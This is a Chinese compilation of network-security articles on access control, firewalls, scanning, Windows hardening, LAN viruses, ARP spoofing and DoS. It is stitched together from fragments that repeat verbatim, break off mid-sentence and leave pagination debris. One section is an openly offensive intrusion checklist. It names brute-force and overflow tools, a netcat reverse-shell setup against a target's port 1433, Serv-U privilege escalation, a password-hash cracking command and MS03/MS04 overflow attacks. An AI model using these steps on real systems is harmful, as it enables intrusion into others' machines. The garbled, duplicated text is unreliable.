下面就是小编给大家分享的防范 入侵攻击的主要方法分析小结(共含17篇),希望大家喜欢!同时,但愿您也能像本文投稿人“阿娴”一样,积极向本站投稿分享好文章。
网络管理人员应认真分析各种可能的入侵和攻击形式,制定符合实际需要的网络安全策略,防止可能从网络和系统内部或外部发起的攻击行为,重点防止那些来自具有敌意的国家、企事业单位、个人和内部恶意人员的攻击, 防止入侵和攻击的主要技术措施包括访问控制技术、防火墙
网络管理人员应认真分析各种可能的入侵和攻击形式,制定符合实际需要的网络安全策略,防止可能从网络和系统内部或外部发起的攻击行为,重点防止那些来自具有敌意的国家、企事业单位、个人和内部恶意人员的攻击。防止入侵和攻击的主要技术措施包括访问控制技术、防火墙技术、入侵检测技术、安全扫描、安全审计和安全管理。
一、访问控制技术
访问控制是网络安全保护和防范的核心策略之一。访问控制的主要目的是确保网络资源不被非法访问和非法利用。访问控制技术所涉及内容较为广泛,包括网络登录控制、网络使用权限控制、目录级安全控制,以及属性安全控制等多种手段。
1.网络登录控制
网络登录控制是网络访问控制的第一道防线。通过网络登录控制可以限制用户对网络服务器的访问,或禁止用户登录,或限制用户只能在指定的工作站上进行登录,或限制用户登录到指定的服务器上,或限制用户只能在指定的时间登录网络等。
网络登录控制一般需要经过三个环节,一是验证用户身份,识别用户名;二是验证用户口令,确认用户身份;三是核查该用户账号的默认权限。在这三个环节中,只要其中一个环节出现异常,该用户就不能登录网络。其中,前两个环节是用户的身份认证过程,是较为重要的环节,用户应加强这个过程的安全保密性,特别是增强用户口令的保密性。用户可以使用一次性口令,或使用IC卡等安全方式来证明自己的身份。
网络登录控制是由网络管理员依据网络安全策略实施的。网络管理员可以随时建立或删除普通用户账号,可以控制和限制普通用户账号的活动范围、访问网络的时间和访问方式,并对登录过程进行必要的审计。对于试图非法登录网络的用户,一经发现立即报警。
2.网络使用权限控制
当用户成功登录网络后,就可以使用其所拥有的权限对网络资源(如目录、文件和相应设备等)进行访问。如果网络对用户的使用权限不能进行有效的控制,则可能导致用户的非法操作或误操作。网络使用权限控制就是针对可能出现的非法操作或误操作提出来的一种安全保护措施。通过网络使用权限控制可以规范和限制用户对网络资源的访问,允许用户访问的资源就开放给用户,不允许用户访问的资源一律加以控制和保护。
网络使用权限控制是通过访问控制表来实现的。在这个访问控制表中,规定了用户可以访问的网络资源,以及能够对这些资源进行的操作。根据网络使用权限,可以将网络用户分为三大类:一是系统管理员用户,负责网络系统的配置和管理;二是审计用户,负责网络系统的安全控制和资源使用情况的审计;三是普通用户,这是由系统管理员创建的用户,其网络使用权限是由系统管理员根据他们的实际需要授予的。系统管理员可随时更改普通用户的权限,或将其删除。
3.目录级安全控制
用户获得网络使用权限后,即可对相应的目录、文件或设备进行规定的访问。系统管理员为用户在目录级指定的权限对该目录下的所有文件、所有子目录及其子目录下的所有文件均有效。如果用户滥用权限,则会对这些目录、文件或设备等网络资源构成严重威胁。这时目录级安全控制和属性安全控制就可以防止用户滥用权限。
一般情况下,对目录和文件的访问权限包括系统管理员权限、读权限、写权限、创建权限、删除权限、修改权限、文件查找权限和访问控制权限。目录级安全控制可以限制用户对目录和文件的访问权限,进而保护目录和文件的安全,防止权限滥用。
4.属性安全控制
属性安全控制是通过给网络资源设置安全属性标记来实现的。当系统管理员给文件、目录和网络设备等资源设置访问属性后,用户对这些资源的访问将会受到一定的限制,
通常,属性安全控制可以限制用户对指定文件进行读、写、删除和执行等操作,可以限制用户查看目录或文件,可以将目录或文件隐藏、共享和设置成系统特性等。
5.服务器安全控制
网络允许在服务器控制台上执行一系列操作。用户使用控制台可以装载和卸载模块,可以安装和删除软件等。网络服务器的安全控制包括设置口令锁定服务器控制台,以防止非法用户修改、删除重要信息或破坏数据;设定服务器登录时间限制、非法访问者检测和关闭的时间间隔。
二、防火墙技术
防火墙是用来保护内部网络免受外部网络的恶意攻击和入侵,为防止计算机犯罪,将入侵者拒之门外的网络安全技术。防火墙是内部网络与外部网络的边界,它能够严密监视进出边界的数据包信息,能够阻挡入侵者,严格限制外部网络对内部网络的访问,也可有效地监视内部网络对外部网络的访问。
三、入侵检测技术
入侵检测技术是网络安全技术和信息技术结合的产物。使用入侵检测技术可以实时监视网络系统的某些区域,当这些区域受到攻击时,能够及时检测和立即响应。
入侵检测有动态和静态之分,动态检测用于预防和审计,静态检测用于恢复和评估。
四、安全扫描
安全扫描是对计算机系统或其他网络设备进行相关安全检测,以查找安全隐患和可能被攻击者利用的漏洞。从安全扫描的作用来看,它既是保证计算机系统和网络安全必不可少的技术方法,也是攻击者攻击系统的技术手段之一,系统管理员运用安全扫描技术可以排除隐患,防止攻击者入侵,而攻击者则利用安全扫描来寻找入侵系统和网络的机会。
安全扫描分主动式和被动式两种。主动式安全扫描是基于网络的,主要通过模拟攻击行为记录系统反应来发现网络中存在的漏洞,这种扫描称为网络安全扫描;而被动式安全扫描是基于主机的,主要通过检查系统中不合适的设置、脆弱性口令,以及其他同安全规则相抵触的对象来发现系统中存在的安全隐患,这种扫描称为系统安全扫描。
安全扫描所涉及的检测技术主要有以下四种:
(1)基于应用的检测技术。它采用被动的、非破坏性的办法检查应用软件包的设置,发现安全漏洞。
(2)基于主机的检测技术。它采用被动的、非破坏性的办法对系统进行检测。通常,它涉及系统的内核,文件的属性,操作系统的补丁等问题。
这种技术还包括口令解密,把一些简单的口令剔除。因此,这种技术可以非常准确地定位系统的问题,发现系统的漏洞。它的缺点是与平台相关,升级复杂。
(3)基于目标的漏洞检测技术。它采用被动的、非破坏性的办法检查系统属性和文件属性,如数据库、注册号等。通过消息摘要算法,对文件的加密数进行检验。这种技术的实现是运行在一个闭环上,不断地处理文件、系统目标、系统目标属性,然后产生检验数,把这些检验数同原来的检验数相比较。一旦发现改变就通知管理员。
(4)基于网络的检测技术,它采用积极的、非破坏性的办法来检验系统是否有可能被攻击而崩溃。它利用了一系列的脚本模拟对系统进行攻击的行为,然后对结果进行分析。它还针对已知的网络漏洞进行检验。网络检测技术常被用来进行穿透实验和安全审计。这种技术可以发现一系列平台的漏洞,也容易安装。但是,它可能会影响网络的性能。
安全扫描技术正逐渐向模块化和专家系统两个方向发展。
在模块化方面,整个安全扫描系统由若干个插件组成,每个插件封装一个或多个漏洞扫描方法,主扫描过程通过调用插件的方法来执行扫描任务。系统更新时,只需添加新的插件就可增加新的扫描功能。另外,由于插件的规范化和标准化,使得安全扫描系统具有较强的灵活性、扩展性和可维护性。
在专家系统方面,安全扫描能够对扫描结果进行整理,形成报表,同时可针对具体漏洞提出相应的解决办法。随着安全扫描技术的发展,希望安全扫描系统能够对网络状况进行整体评估,并提出针对整个网络的安全解决方案。未来的系统,不仅仅是一个漏洞扫描工具,还应该是一个安全评估专家。
上一页12 下一页
一、计算机的设置
1、关闭“文件和打印共享”
文件和打印共享应该是一个非常有用的功能,但在不需要它的时候,也是 入侵的很好的安全漏洞,所以在没有必要“文件和打印共享”的情况下,我们可以将它关闭。用鼠标右击“网络邻居”,选择“属性”,然后单击“文件和打印共享”按钮,将弹出的“文件和打印共享”对话框中的两个复选框中的钩去掉即可。 虽然“文件和打印共享”关闭了,但是还不能确保安全,还要修改注册表,禁止它人更改“文件和打印共享”。打开注册表编辑器,选择“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NetWork”主键,在该主键下新建DWORD类型的键值,键值名为“NoFileSharingControl”,键值设为“1”表示禁止这项功能,从而达到禁止更改“文件和打印共享”的目的;键值为“0”表示允许这项功能。这样在“网络邻居”的“属性”对话框中“文件和打印共享”就不复存在了。
2、把Guest账号禁用
有很多入侵都是通过这个账号进一步获得管理员密码或者权限的。如果不想把自己的计算机给别人当玩具,那还是禁止的好。打开控制面板,双击“用户和密码”,单击“高级”选项卡,再单击“高级”按钮,弹出本地用户和组窗口。在Guest账号上面点击右键,选择属性,在“常规”页中选中“账户已停用”。另外,将Administrator账号改名可以防止 知道自己的管理员账号,这会在很大程度上保证计算机安全。
3、禁止建立空连接
在默认的情况下,任何用户都可以通过空连接连上服务器,枚举账号并猜测密码。因此,我们必须禁止建立空连接。方法是修改注册表:打开注册表“HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA”,将DWORD值“RestrictAnonymous”的键值改为“1”即可。
二、隐藏IP地址
经常利用一些网络探测技术来查看我们的主机信息,主要目的就是得到网络中主机的IP地址。IP地址在网络安全上是一个很重要的概念,如果攻击者知道了你的IP地址,等于为他的攻击准备好了目标,他可以向这个IP发动各种进攻,如DoS( 拒绝服务 )攻击、Floop溢出攻击等,
隐藏IP地址的主要方法是使用代理服务器。与直接连接到Internet相比,使用代理服务器能保护上网用户的IP地址,从而保障上网安全。代理服务器的原理是在客户机(用户上网的计算机)和远程服务器(如用户想访问远端WWW服务器)之间架设一个“中转站”,当客户机向远程服务器提出服务要求后,代理服务器首先截取用户的请求,然后代理服务器将服务请求转交远程服务器,从而实现客户机和远程服务器之间的联系。很显然,使用代理服务器后,其它用户只能探测到代理服务器的IP地址而不是用户的IP地址,这就实现了隐藏用户IP地址的目的,保障了用户上网安全。提供免费代理服务器的网站有很多,你也可以自己用代理猎手等工具来查找。
三、关闭不必要的端口
在入侵时常常会扫描你的计算机端口,如果安装了端口监视程序(比如Netwatch),该监视程序则会有警告提示。如果遇到这种入侵,可用工具软件关闭用不到的端口。
四、更换管理员帐户
Administrator帐户拥有最高的系统权限,一旦该帐户被人利用,后果不堪设想。 入侵的常用手段之一就是试图获得Administrator帐户的密码,所以我们要重新配置Administrator帐号。首先是为Administrator帐户设置一个强大复杂的密码,然后我们重命名Administrator帐户,再创建一个没有管理员权限的Administrator帐户欺骗入侵者。这样一来,入侵者就很难搞清哪个帐户真正拥有管理员权限,也就在一定程度上减少了危险性。
五、杜绝Guest帐户的入侵
Guest帐户即所谓的来宾帐户,它可以访问计算机,但受到限制。不幸的是,Guest也为 入侵打开了方便之门!网上有很多文章中都介绍过如何利用Guest用户得到管理员权限的方法,所以要杜绝基于Guest帐户的系统入侵。
禁用或彻底删除Guest帐户是最好的办法,但在某些必须使用到Guest帐户的情况下,就需要通过其它途径来做好防御工作了。首先要给Guest设一个强壮的密码,然后详细设置Guest帐户对物理路径的访问权限。举例来说,如果你要防止Guest用户可以访问tool文件夹,可以右击该文件夹,在弹出菜单中选择“安全”标签,从中可看到可以访问此文件夹的所有用户。删除管理员之外的所有用户即可。或者在权限中为相应的用户设定权限,比方说只能“列出文件夹目录”和“读取”等,这样就安全多了。
防止入侵和攻击的主要技术措施包括访问控制技术、防火墙技术、入侵检测技术、安全扫描、安全审计和安全管理,
入侵攻击的主要方法与技巧
。
一、访问控制技术
访问控制是网络安全保护和防范的核心策略之一。访问控制的主要目的是确保网络资源不被非法访问和非法利用。访问控制技术所涉及内容较为广泛,包括网络登录控制、网络使用权限控制、目录级安全控制,以及属性安全控制等多种手段。
1.网络登录控制
网络登录控制是网络访问控制的第一道防线。通过网络登录控制可以限制用户对网络服务器的访问,或禁止用户登录,或限制用户只能在指定的工作站上进行登录,或限制用户登录到指定的服务器上,或限制用户只能在指定的时间登录网络等。
网络登录控制一般需要经过三个环节,一是验证用户身份,识别用户名;二是验证用户口令,确认用户身份;三是核查该用户账号的默认权限。在这三个环节中,只要其中一个环节出现异常,该用户就不能登录网络。其中,前两个环节是用户的身份认证过程,是较为重要的环节,用户应加强这个过程的安全保密性,特别是增强用户口令的保密性。用户可以使用一次性口令,或使用IC卡等安全方式来证明自己的身份。
网络登录控制是由网络管理员依据网络安全策略实施的。网络管理员可以随时建立或删除普通用户账号,可以控制和限制普通用户账号的活动范围、访问网络的时间和访问方式,并对登录过程进行必要的审计。对于试图非法登录网络的用户,一经发现立即报警。
2.网络使用权限控制
当用户成功登录网络后,就可以使用其所拥有的权限对网络资源(如目录、文件和相应设备等)进行访问。如果网络对用户的使用权限不能进行有效的控制,则可能导致用户的非法操作或误操作。网络使用权限控制就是针对可能出现的非法操作或误操作提出来的一种安全保护措施。通过网络使用权限控制可以规范和限制用户对网络资源的访问,允许用户访问的资源就开放给用户,不允许用户访问的资源一律加以控制和保护。
网络使用权限控制是通过访问控制表来实现的。在这个访问控制表中,规定了用户可以访问的网络资源,以及能够对这些资源进行的操作。根据网络使用权限,可以将网络用户分为三大类:一是系统管理员用户,负责网络系统的配置和管理;二是审计用户,负责网络系统的安全控制和资源使用情况的审计;三是普通用户,这是由系统管理员创建的用户,其网络使用权限是由系统管理员根据他们的实际需要授予的。系统管理员可随时更改普通用户的权限,或将其删除。
3.目录级安全控制
用户获得网络使用权限后,即可对相应的目录、文件或设备进行规定的访问,
系统管理员为用户在目录级指定的权限对该目录下的所有文件、所有子目录及其子目录下的所有文件均有效。如果用户滥用权限,则会对这些目录、文件或设备等网络资源构成严重威胁。这时目录级安全控制和属性安全控制就可以防止用户滥用权限。
一般情况下,对目录和文件的访问权限包括系统管理员权限、读权限、写权限、创建权限、删除权限、修改权限、文件查找权限和访问控制权限。目录级安全控制可以限制用户对目录和文件的访问权限,进而保护目录和文件的安全,防止权限滥用。
4.属性安全控制
属性安全控制是通过给网络资源设置安全属性标记来实现的。当系统管理员给文件、目录和网络设备等资源设置访问属性后,用户对这些资源的访问将会受到一定的限制。
通常,属性安全控制可以限制用户对指定文件进行读、写、删除和执行等操作,可以限制用户查看目录或文件,可以将目录或文件隐藏、共享和设置成系统特性等。
5.服务器安全控制
网络允许在服务器控制台上执行一系列操作。用户使用控制台可以装载和卸载模块,可以安装和删除软件等。网络服务器的安全控制包括设置口令锁定服务器控制台,以防止非法用户修改、删除重要信息或破坏数据;设定服务器登录时间限制、非法访问者检测和关闭的时间间隔。
二、防火墙技术
防火墙是用来保护内部网络免受外部网络的恶意攻击和入侵,为防止计算机犯罪,将入侵者拒之门外的网络安全技术。防火墙是内部网络与外部网络的边界,它能够严密监视进出边界的数据包信息,能够阻挡入侵者,严格限制外部网络对内部网络的访问,也可有效地监视内部网络对外部网络的访问。
三、入侵检测技术
入侵检测技术是网络安全技术和信息技术结合的产物。使用入侵检测技术可以实时监视网络系统的某些区域,当这些区域受到攻击时,能够及时检测和立即响应。
入侵检测有动态和静态之分,动态检测用于预防和审计,静态检测用于恢复和评估。
四、安全扫描
安全扫描是对计算机系统或其他网络设备进行相关安全检测,以查找安全隐患和可能被攻击者利用的漏洞。从安全扫描的作用来看,它既是保证计算机系统和网络安全必不可少的技术方法,也是攻击者攻击系统的技术手段之一,系统管理员运用安全扫描技术可以排除隐患,防止攻击者入侵,而攻击者则利用安全扫描来寻找入侵系统和网络的机会。
安全扫描分主动式和被动式两种。主动式安全扫描是基于网络的,主要通过模拟攻击行为记录系统反应来发现网络中存在的漏洞,这种扫描称为网络安全扫描;而被动式安全扫描是基于主机的,主要通过检查系统中不合适的设置、脆弱性口令,以及其他同安全规则相抵触的对象来发现系统中存在的安全隐患,这种扫描称为系统安全扫描。
[1] [2] 下一页
实用的几种入侵方法及工具防范!
1. 1433端口入侵
scanport.exe 查有1433的机器
SQLScanPass.exe 进行字典暴破(字典是关键)
最后 SQLTools.exe入侵
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
2. 4899端口入侵
用4899过滤器.exe,扫描空口令的机器。
3. 3899的入侵
对很早的机器,可以试试3389的溢出(win3389ex.exe)
对的机器,可以试试字典暴破。(tscrack.exe)
4. 80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入,
(小榕的注入软件)。
5. serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
6. 554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞
进行溢出入侵。
9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
计算机病毒在网络中泛滥已久,而其在局域网中也能快速繁殖,导致局域网计算机的相互感染,使整个公司网络瘫痪无法正常运做,其损失是无法估计的。
一、局域网病毒入侵原理及现象
一般来说,计算机网络的基本构成包括网络服务器和网络节点站(包括有盘工作站、无盘工作站和远程工作站)。计算机病毒一般首先通过各种途径进入到有盘工作站,也就进入网络,然后开始在网上的传播。具体地说,其传播方式有以下几种。
(1)病毒直接从工作站拷贝到服务器中或通过邮件在网内传播;
(2)病毒先传染工作站,在工作站内存驻留,等运行网络盘内程序时再传染给服务器;
(3)病毒先传染工作站,在工作站内存驻留,在病毒运行时直接通过映像路径传染到服务器中
(4)如果远程工作站被病毒侵入,病毒也可以通过数据交换进入网络服务器中一旦病毒进入文件服务器,就可通过它迅速传染到整个网络的每一个计算机上。而对于无盘工作站来说,由于其并非真的“无盘”(它的盘是网络盘),当其运行网络盘上的一个带毒程序时,便将内存中的病毒传染给该程序或通过映像路径传染到服务器的其他的文件上,因此无盘工作站也是病毒孽生的温床。
由以上病毒在网络上的传播方式可见,在网络环境下,网络病毒除了具有可传播性、可执行性、破坏性等计算机病毒的共性外,还具有一些新的特点。
(1)感染速度快
在单机环境下,病毒只能通过介质从一台计算机带到另一台,而在网络中则可以通过网络通讯机制进行迅速扩散。根据测定,在网络正常工作情况下,只要有一台工作站有病毒,就可在几十分钟内将网上的数百台计算机全部感染。
(2)扩散面广
由于病毒在网络中扩散非常快,扩散范围很大,不但能迅速传染局域网内所有计算机,还能通过远程工作站将病毒在一瞬间传播到千里之外。
(3)传播的形式复杂多样
计算机病毒在网络上一般是通过“工作站”到“服务器”到“工作站”的途径进行传播的,但现在病毒技术进步了不少,传播的形式复杂多样。
(4)难于彻底清除e.
单机上的计算机病毒有时可以通过带毒文件来解决。低级格式化硬盘等措施能将病毒彻底清除。而网络中只要有一台工作站未能清除干净,就可使整个网络重新被病毒感染,甚至刚刚完成杀毒工作的一台工作站,就有可能被网上另一台带毒工作站所感染。因此,仅对工作站进行杀毒,并不能解决病毒对网络的危害。
(5)破坏性大
网络病毒将直接影响网络的工作,轻则降低速度,影响工作效率,重则使网络崩溃,破坏服务器信息,使多年工作毁于一旦。
(6)可激发性
网络病毒激发的条件多样化,可以是内部时钟、系统的日期和用户名,也可以是网络的一次通信等。一个病毒程序可以按照病毒设计者的要求,在某个工作站上激发并发出攻击。
(7)潜在性
网络一旦感染了病毒,即使病毒已被清除,其潜在的危险性也是巨大的。根据统计,病毒在网络上被清除后,85%的网络在30天内会被再次感染。
例如尼姆达病毒,会搜索本地网络的文件共享,无论是文件服务器还是终端客户机,一旦找到,便安装一个隐藏文件,名为Riched20.DLL到每一个包含“DOC”和“eml”文件的目录中,当用户通过Word、写字板、Outlook打开“DOC”和“eml”文档时,这些应用程序将执行 Riched20.DLL文件,从而使机器被感染,同时该病毒还可以感染远程服务器被启动的文件。带有尼姆达病毒的电子邮件,不需你打开附件,只要阅读或预览了带病毒的邮件,就会继续发送带毒邮件给你通讯簿里的朋友。
二、局域网病毒防范方法
以“尼姆达”病毒为例,个人用户感染该病毒后,使用单机版杀毒软件即可清除;然而企业的网络中,一台机器一旦感染“尼姆达”,病毒便会自动复制、发送并采用各种手段不停交叉感染局域网内的其他用户。
计算机病毒形式及传播途径日趋多样化,因此,大型企业网络系统的防病毒工作已不再像单台计算机病毒的检测及清除那样简单,而需要建立多层次的、立体的病毒防护体系,而且要具备完善的管理系统来设置和维护对病毒的防护策略。
一个企业网的防病毒体系是建立在每个局域网的防病毒系统上的,应该根据每个局域网的防病毒要求,建立局域网防病毒控制系统,分别设置有针对性的防病毒策略。
(1)增加安全意识
杜绝病毒,主观能动性起到很重要的作用。病毒的蔓延,经常是由于企业内部员工对病毒的传播方式不够了解,病毒传播的渠道有很多种,可通过网络、物理介质等。查杀病毒,首先要知道病毒到底是什么,它的危害是怎么样的,知道了病毒危害性,提高了安全意识,杜绝毒瘤的战役就已经成功了一半。平时,企业要从加强安全意识着手,对日常工作中隐藏的病毒危害增加警觉性,如安装一种大众认可的网络版杀毒软件,定时更新病毒定义,对来历不明的文件运行前进行查杀,每周查杀一次病毒,减少共享文件夹的数量,文件共享的时候尽量控制权限和增加密码等,都可以很好地防止病毒在网络中的传播。
(2)小心邮件
随着网络的普及,电子信箱成了人们工作中不可缺少的一种媒介。它方便快捷在提高了人们的工作效率的同时,也无意之中成为了病毒的帮凶。有数据显示,如今有超过90%的病毒通过邮件进行传播。
尽管这些病毒的传播原理很简单,但这块决非仅仅是技术问题,还应该教育用户和企业,让它们采取适当的措施。例如,如果所有的Windows用户都关闭了VB脚本功能,像库尔尼科娃这样的病毒就不可能传播。只要用户随时小心警惕,不要打开值得怀疑的邮件,就可把病毒拒绝在外。
(3)挑选网络版杀毒软件
选择一个功力高深的网络版病毒“杀手”就至关重要了。一般而言,查杀是否彻底,界面是否友好、方便,能否实现远程控制、集中管理是决定一个网络杀毒软件的三大要素。
计算机病毒在网络中泛滥已久,而其在局域网中也能快速繁殖,导致局域网计算机的相互感染,下面将为大家介绍有关:
局域网病毒入侵原理与防范方法,
一、局域网病毒入侵原理及现象
一般来说,计算机网络的基本构成包括网络服务器和网络节点站(包括有盘工作站、无盘工作站和远程工作站)。计算机病毒一般首先通过各种途径进入到有盘工作站,也就进入网络,然后开始在网上的传播。具体地说,其传播方式有以下几种。
(1)病毒直接从工作站拷贝到服务器中或通过邮件在网内传播;
(2)病毒先传染工作站,在工作站内存驻留,等运行网络盘内程序时再传染给服务器;
(3)病毒先传染工作站,在工作站内存驻留,在病毒运行时直接通过映像路径传染到服务器中
(4)如果远程工作站被病毒侵入,病毒也可以通过数据交换进入网络服务器中一旦病毒进入文件服务器,就可通过它迅速传染到整个网络的每一个计算机上。而对于无盘工作站来说,由于其并非真的无盘(它的盘是网络盘),当其运行网络盘上的一个带毒程序时,便将内存中的病毒传染给该程序或通过映像路径传染到服务器的其他的文件上,因此无盘工作站也是病毒孽生的温床。
由以上病毒在网络上的传播方式可见,在网络环境下,网络病毒除了具有可传播性、可执行性、破坏性等计算机病毒的共性外,还具有一些新的特点。
(1)感染速度快
在单机环境下,病毒只能通过介质从一台计算机带到另一台,而在网络中则可以通过网络通讯机制进行迅速扩散。根据测定,在网络正常工作情况下,只要有一台工作站有病毒,就可在几十分钟内将网上的数百台计算机全部感染。
(2)扩散面广
由于病毒在网络中扩散非常快,扩散范围很大,不但能迅速传染局域网内所有计算机,还能通过远程工作站将病毒在一瞬间传播到千里之外,
(3)传播的形式复杂多样
计算机病毒在网络上一般是通过工作站到服务器到工作站的途径进行传播的,但现在病毒技术进步了不少,传播的形式复杂多样。
(4)难于彻底清除
单机上的计算机病毒有时可以通过带毒文件来解决。低级格式化硬盘等措施能将病毒彻底清除。而网络中只要有一台工作站未能清除干净,就可使整个网络重新被病毒感染,甚至刚刚完成杀毒工作的一台工作站,就有可能被网上另一台带毒工作站所感染。因此,仅对工作站进行杀毒,并不能解决病毒对网络的危害。
(5)破坏性大
网络病毒将直接影响网络的工作,轻则降低速度,影响工作效率,重则使网络崩溃,破坏服务器信息,使多年工作毁于一旦。
(6)可激发性
网络病毒激发的条件多样化,可以是内部时钟、系统的日期和用户名,也可以是网络的一次通信等。一个病毒程序可以按照病毒设计者的要求,在某个工作站上激发并发出攻击。
(7)潜在性
网络一旦感染了病毒,即使病毒已被清除,其潜在的危险性也是巨大的。根据统计,病毒在网络上被清除后,85%的网络在30天内会被再次感染。
例如尼姆达病毒,会搜索本地网络的文件共享,无论是文件服务器还是终端客户机,一旦找到,便安装一个隐藏文件,名为Riched20.DLL到每一个包含DOC和eml文件的目录中,当用户通过Word、写字板、Outlook打开DOC和eml文档时,这些应用程序将执行Riched20.DLL文件,从而使机器被感染,同时该病毒还可以感染远程服务器被启动的文件。带有尼姆达病毒的电子邮件,不需你打开附件,只要阅读或预览了带病毒的邮件,就会继续发送带毒邮件给你通讯簿里的朋友。
本文介绍了ARP攻击的原理以及由此引发的网络安全问题,并且结合实际情况,提出在校园网中实施多层次的防范方法,以解决因ARP攻击而引发的网络安全问题,最后介绍了一些实用性较强且操作简单的检测和抵御攻击的有效方法,
您是否遇到局域网内频繁性区域或整体掉线,重启计算机或网络设备后恢复正常?您的网速是否时快时慢,极其不稳定,但单机进行光纤数据测试时一切正常?您是否时常听到教职工的网上银行、游戏及QQ账号频繁丢失的消息?
这些问题的出现有很大一部分要归功于ARP攻击,我校局域网自去年5月份开始ARP攻击频频出现,目前校园网内已发现的“ARP攻击”系列病毒已经有了几十个变种。据检测数据显示,APR攻击从未停止过,为此有效的防范ARP形式的网络攻击已成为确保网络畅通必要条件。
一、ARP的基本知识
1、什么是ARP?
ARP协议是“Address Resolution Protocol”(地址解析协议)的缩写。在局域网中,网络中实际传输的是“帧”,帧里面是有目标主机的MAC地址的。在以太网中,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址。但这个目标MAC地址是如何获得的呢?它就是通过地址解析协议获得的。
所谓“地址解析”就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。
在局域网中,通过ARP协议来完成IP地址转换为第二层物理地址(即MAC地址)的,ARP协议对网络安全具有重要的意义。
2、ARP协议的工作原理
正常情况下,每台主机都会在自己的ARP缓冲区中建立一个 ARP列表,以表示IP地址和MAC地址的对应关系。当源主机需要将一个数据包要发送到目的主机时,会首先检查自己 ARP列表中是否存在该 IP地址对应的MAC地址,如果有o就直接将数据包发送到这个MAC地址;
如果没有,就向本地网段发起一个ARP请求的广播包,查询此目的主机对应的MAC地址。此ARP请求数据包里包括源主机的IP地址、硬件地址、以及目的主机的IP地址。网络中所有的主机收到这个ARP请求后,会检查数据包中的目的IP是否和自己的IP地址一致。
如果不相同就忽略此数据包;如果相同,该主机首先将发送端的MAC地址和IP地址添加到自己的ARP列表中,如果ARP表中已经存在该IP的信息,则将其覆盖,然后给源主机发送一个 ARP响应数据包,告诉对方自己是它需要查找的MAC地址;源主机收到这个ARP响应数据包后,将得到的目的主机的IP地址和MAC地址添加到自己的 ARP列表中,并利用此信息开始数据的传输。
1. 要发送网络包给192.168.1.1,但不知MAC地址?
2. 在局域网发出广播包“192.168.1.1的MAC地址是什么?”
3. 其他机器不回应,只有192.168.1.1回应“192.168.1.1的MAC地址是00-aa-00-62-c6-09”
从上面可以看出,ARP协议的基础就是信任局域网内所有的人,那么就很容易实现在以太网上的ARP欺骗,
更何况ARP协议是工作在更低于IP协议的协议层,因此它的危害就更加隐蔽。
二、ARP欺骗的原理
ARP类型的攻击最早用于 之用,网内中毒电脑可以伪装成路由器,盗取用户的密码, 后来发展成内藏于软件,扰乱其他局域网用户正常的网络通信,下面我们简要阐述ARP欺骗的原理:假设这样一个网络,一个交换机连接了3台机器,依次是计算机A,B,C
A的地址为:IP:192.168.1.1 MAC: AA-AA-AA-AA-AA-AA
B的地址为:IP:192.168.1.2 MAC: BB-BB-BB-BB-BB-BB
C的地址为:IP:192.168.1.3 MAC: CC-CC-CC-CC-CC-CC
第二步:正常情况下在A计算机上运行ARP -A查询ARP缓存表应该出现如下信息。
Interface: 192.168.1.1 on Interface 0x1000003
Internet Address Physical Address Type
192.168.1.3 CC-CC-CC-CC-CC-CC dynamic
第三步:在计算机B上运行ARP欺骗程序,来发送ARP欺骗包。
B向A发送一个自己伪造的ARP应答,而这个应答中的数据为发送方IP地址是192.168.10.3(C的IP地址),MAC地址是DD- DD-DD-DD-DD-DD(C的MAC地址本来应该是CC-CC-CC-CC-CC-CC,这里被伪造了)。当A接收到B伪造的ARP应答,就会更新本地的ARP缓存(A可不知道被伪造了)。而且A不知道其实是从B发送过来的,A这里只有192.168.10.3(C的IP地址)和无效的DD-DD- DD-DD-DD-DD MAC地址。
第四步:欺骗完毕我们在A计算机上运行ARP -A来查询ARP缓存信息。你会发现原来正确的信息现在已经出现了错误。
Interface: 192.168.1.1 on Interface 0x1000003
Internet Address Physical Address Type
192.168.1.3 DD-DD-DD-DD-DD-DD dynamic
上面例子中在计算机A上的关于计算机C的MAC地址已经错误了,所以即使以后从A计算机访问C计算机这个192.168.1.3这个地址也会被 ARP协议错误的解析成MAC地址为DD-DD-DD-DD-DD-DD的。
当局域网中一台机器,反复向其他机器,特别是向网关,发送这样无效假冒的ARP应答信息包时,严重的网络堵塞就会开始。由于网关MAC地址错误,所以从网络中计算机发来的数据无法正常发到网关,自然无法正常上网。
这就造成了无法访问外网的问题,另外由于很多时候网关还控制着我们的局域网LAN上网,所以这时我们的LAN访问也就出现问题了。下图更直观的展示了ARP欺骗攻击的情况:
由于拒绝服务攻击工具的泛滥,及所针对的协议层的缺陷短时无法改变的事实,拒绝服务攻击也就成为流传广泛、极难防范的一种攻击方式,
Linux下防范DoS攻击的方法
,
虽然到目前为止,没有一个绝对的方法可以制止这类攻击;但对于不同的攻击方式,还是有一些解决方法的。本文以Redhat Linux
目前,使用ADSL的用户越来越多,由于ADSL用户在线时间长、速度快,因此成为 们的攻击目标,现在网上出现了各种越来越详细的“IP地址库”,要知道一些ADSL用户的IP是非常容易的事情。要怎么保卫自己的网络安全呢?不妨看看以下方法。
一、取消文件夹隐藏共享
